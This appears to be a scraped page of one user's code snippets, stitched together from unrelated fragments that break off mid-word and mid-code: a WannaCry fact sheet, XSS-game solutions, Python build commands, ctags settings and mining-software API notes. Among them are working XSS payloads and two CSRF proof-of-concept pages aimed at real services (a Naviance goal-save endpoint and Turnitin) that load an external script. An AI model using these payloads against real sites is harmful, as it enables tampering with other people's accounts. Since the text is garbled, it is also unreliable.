Aaron Esau Arinerron

WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm

Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).

update: A minor variant of the viru

	import java.util.*;
	import java.util.regex.Pattern;
	import java.net.*;
	import java.io.*;

	public class ChaosWebs {
	public static double time = 6 * 60 * 60 * 1000;
	public static String filename = ".last_post.txt";

	public static void main(String[] args) {

	These are my solutions to http://xss-game.appspot.com/. I did not use any hints on these, but I took a while on the last two.

	[Level 1]: Search for the string.
	<script>alert(1)</script>

	[Level 2]: Post the string
	<img src=x onerror=javascript:alert(1)></img>

	[Level 3]: Navigate to the URL
	http://xss-game.appspot.com/level3/frame#1' onerror="javascript:alert(1)"

	wget https://www.python.org/ftp/python/3.4.2/Python-3.4.2.tgz
	tar xvf Python-3.4.2.tgz
	cd Python-3.4.2
	./configure
	make
	make test
	sudo make install
	cd ..
	rm -rf Python-3.4.2
	rm Python-3.4.2.tgz

	<html>
	<body>
	<!--
	Search for the string "[jsfile]" without quotes and replace it with the URL to your custom js file you want to run.
	To test it out, replace "[jsfile]" with "https://arinerron.com/js/script.js".
	-->

	<iframe style="display:none" name="csrf-frame"></iframe>

	<form method='POST' action='https://connection.naviance.com/family-connection/success-planner/goals/save' target="csrf-frame" id="csrf-form">

	import commands
	import numpy as np


	def fetch_gpu_status():
	""" Run nvidia-smi and parse the output
	requires Python 2 only dependency
	"""

	status_code, output = commands.getstatusoutput('nvidia-smi')

	vim ~/.ctags
	--langdef=Solidity
	--langmap=Solidity:.sol
	--regex-Solidity=/^contract[ \t]+([a-zA-Z0-9_]+)/\1/c,contract/
	--regex-Solidity=/[ \t]*function[ \t]+([a-zA-Z0-9_]+)/\1/f,function/
	--regex-Solidity=/[ \t]*event[ \t]+([a-zA-Z0-9_]+)/\1/e,event/
	--regex-Solidity=/[ \t](struct[ \t]+[a-zA-Z0-9_]+)([ \t]\{)/\1/v,variable/
	--regex-Solidity=/[ \t](enum[ \t]+[a-zA-Z0-9_]+)([ \t]\{)/\1/v,variable/
	--regex-Solidity=/[ \t]mapping[ \t]+\(([a-zA-Z0-9_]+)[ \t]=>[ \t]*([a-zA-Z0-9_]+)\)[ \t]+([a-zA-Z0-9_]+)/\3 (\1=>\2)/m,mapping/

	<html>
	<head>
	<title>turnitin.com PoC</title>
	</head>
	<body>

	<!--
	Search for the string "[jsfile]" without quotes and replace it with the URL to your custom js file you want to run.
	To test it out, replace "[jsfile]" with "https://arinerron.com/js/script.js".
	-->

	EthMan uses raw TCP/IP connections (not HTTP) for remote management and statistics. Optionally, "psw" field is added to requests is the password for remote management is set for miner.
	The following commands are available (JSON format):


	----------------
	REQUEST:
	{"id":0,"jsonrpc":"2.0","method":"miner_getstat1"}

	RESPONSE:
	{"result": ["9.3 - ETH", "21", "182724;51;0", "30502;30457;30297;30481;30479;30505", "0;0;0", "off;off;off;off;off;off", "53;71;57;67;61;72;55;70;59;71;61;70", "eth-eu1.nanopool.org:9999", "0;0;0;0"]}